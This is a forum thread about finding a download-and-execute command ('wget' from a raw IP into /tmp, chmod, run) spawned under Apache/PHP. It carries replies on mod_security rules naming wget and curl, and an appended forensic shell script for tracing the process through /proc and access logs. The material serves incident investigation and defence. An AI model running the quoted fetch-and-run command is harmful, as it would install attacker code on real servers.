#1 (Join Date: Feb 2004, Posts: 1,226)
    executing commands as apache

    hello

    I run PHP as a module on my Apache, and sometimes I find things like this in my `ps -auxw | grep apache`:
    sh -c cd /tmp;wget http://222.235.73.39/http;chmod +x http;./http
    The problem is:
    1) it's probably not run by a PHP script (since it wouldn't open a new process for it)
    2) I grepped all the domain logs for the IP or hostname (when they use a host) and didn't find anything
    3) I checked all ports bound by Apache to see whether the exploiter isn't running a shell and executing the commands through it... nothing found

    So... how can these commands be executed by Apache?
    In which other ways can they make Apache execute things?!

#2 (Join Date: Jun 2000, Location: Washington, USA, Posts: 5,991)
    They are likely being executed by a PHP script. The PHP script is spawning off a shell instance to do its bidding. As well, if the exploit is done via POST, not much will show up in the logs.

    I'd suggest installing mod_security, and tuning it to fit your needs. It'll really cut down on this sort of thing.

#3 (Join Date: Feb 2004, Posts: 1,226)
    Originally posted by JTY
    They are likely being executed by a PHP script. The PHP script is spawning off a shell instance to do its bidding. As well, if the exploit is done via POST, not much will show up in the logs.

    I'd suggest installing mod_security, and tuning it to fit your needs. It'll really cut down on this sort of thing.

    mod_security is already installed, but I've no idea how they're doing this.
    As far as I checked, they tried to bind the shell, but didn't manage to (/tmp has "noexec").
    Any ideas on how to find out whether it was by POST?!

    May this vuln be exploited by POST? http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=302011

#4 (Join Date: Dec 2002, Location: Egypt, Posts: 151)
    You need to tighten your mod_security rules a bit to include 'wget', 'curl', etc.

    When you see something like the above line, do the following:

    cd /proc/PID

    There is much helpful info in this directory, like the command used, and also fd (file descriptors), which will contain all the files used by this command; from all this info you will surely find the buggy script that is causing this.

    Hope this helps.
    Knowledge is Power, Spread it.
    www.e-tutankhamun.com
    AIM:AhmedFouad0 , yahooID:xor2004
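The /proc walk from post #4, written out as a script. This is an added example, not code posted in the thread: it assumes a Linux /proc layout and an Apache "combined" access log, and the log lines, host names and the `SUSPECT_PID` variable are constructed for the demo. `proc_info` dumps the command line, working directory, binary, uid and open descriptors of the suspicious process; `proc_ancestry` follows `PPid:` upwards so you can see whether the `sh -c cd /tmp;wget ...` really hangs off an httpd worker; `php_posts` addresses the question in post #3: the access log never records a POST body, so grepping it for the download host finds nothing, but the PHP scripts that received POSTs around the time the process appeared are the candidates to inspect.

```shell
#!/bin/sh
# Added example (not from the thread). Assumes Linux /proc and an Apache
# combined access log. All names and sample data below are constructed.

# proc_info PID: what /proc/PID reveals about a suspicious process.
proc_info() {
    pid=$1
    [ -d "/proc/$pid" ] || { echo "no such process: $pid" >&2; return 1; }
    # cmdline is NUL-separated; print it as one line
    echo "cmdline: $(tr '\0' ' ' < "/proc/$pid/cmdline")"
    echo "cwd:     $(readlink "/proc/$pid/cwd" 2>/dev/null)"
    echo "exe:     $(readlink "/proc/$pid/exe" 2>/dev/null)"
    echo "uid:     $(awk '/^Uid:/ {print $2}' "/proc/$pid/status")"
    # open descriptors: files, pipes and sockets (a bound shell shows up here)
    for fd in "/proc/$pid/fd"/*; do
        [ -L "$fd" ] || continue
        echo "fd $(basename "$fd") -> $(readlink "$fd" 2>/dev/null)"
    done
}

# proc_ancestry PID: print "pid name" for PID and each ancestor up to init.
# For the wget case this should read sh -> httpd (worker) -> httpd (parent),
# which ties the command to Apache rather than to cron or a login shell.
proc_ancestry() {
    pid=$1
    while [ "${pid:-0}" -gt 0 ] && [ -r "/proc/$pid/status" ]; do
        name=$(awk '/^Name:/ {print $2}' "/proc/$pid/status")
        ppid=$(awk '/^PPid:/ {print $2}' "/proc/$pid/status")
        echo "$pid $name"
        pid=$ppid
    done
}

# php_posts LOGFILE: list POST requests to PHP scripts as "time client script".
# Combined log fields: $1 client, $4 "[time", $6 "\"METHOD", $7 path.
php_posts() {
    awk '$6 == "\"POST" && $7 ~ /\.php/ { print substr($4, 2), $1, $7 }' "$1"
}

# sample_log FILE: write constructed access-log lines (not real traffic).
sample_log() {
    cat > "$1" <<'EOF'
10.0.0.5 - - [14/Mar/2004:03:12:07 +0000] "GET /forum/index.php HTTP/1.1" 200 8123 "-" "Mozilla/4.0"
10.0.0.5 - - [14/Mar/2004:03:12:09 +0000] "POST /forum/viewtopic.php?t=12 HTTP/1.1" 200 412 "-" "Mozilla/4.0"
10.0.0.9 - - [14/Mar/2004:03:12:11 +0000] "POST /contact.html HTTP/1.1" 200 88 "-" "Mozilla/4.0"
10.0.0.5 - - [14/Mar/2004:03:12:13 +0000] "POST /forum/privmsg.php HTTP/1.1" 200 91 "-" "Mozilla/4.0"
EOF
}

# Usage: SUSPECT_PID=$(pgrep -f 'wget http://') sh this_script.sh
if [ -n "$SUSPECT_PID" ]; then
    proc_info "$SUSPECT_PID"
    proc_ancestry "$SUSPECT_PID"
fi
LOG=$(mktemp)
sample_log "$LOG"
php_posts "$LOG"
rm -f "$LOG"
```

On the constructed log the POST listing shows two hits, both `.php` scripts from the same client; the POST to `contact.html` and the GET are dropped. Run it against the real log with the timestamp from `ls -l --time-style=full-iso /proc/PID` (the directory's mtime is close to process start) to narrow the window.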
